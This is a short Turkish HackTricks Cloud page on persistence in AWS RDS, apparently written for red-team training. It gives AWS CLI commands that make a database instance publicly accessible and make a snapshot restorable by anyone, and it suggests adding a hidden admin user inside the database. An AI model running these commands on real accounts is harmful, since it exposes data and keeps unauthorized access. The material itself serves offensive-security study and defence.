HackTricks CloudAWS - RDS Persistence
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
RDS
Daha fazla bilgi için bakınız:
AWS - Relational Database (RDS) Enum
Örneği genel erişime açma: rds:ModifyDBInstance
Bu izne sahip bir saldırgan mevcut bir RDS örneğini genel erişime açmak için değiştirebilir.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
DB içinde bir admin kullanıcı oluştur
Bir saldırgan sadece DB içinde bir kullanıcı oluşturabilir; böylece master kullanıcı parolası değişse bile veritabanına erişimi kaybetmez.
Snapshot’ı herkese açık yap
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
AWS Hacking’i öğrenin ve pratik yapın:
GCP Hacking’i öğrenin ve pratik yapın:
Az Hacking’i öğrenin ve pratik yapın:HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.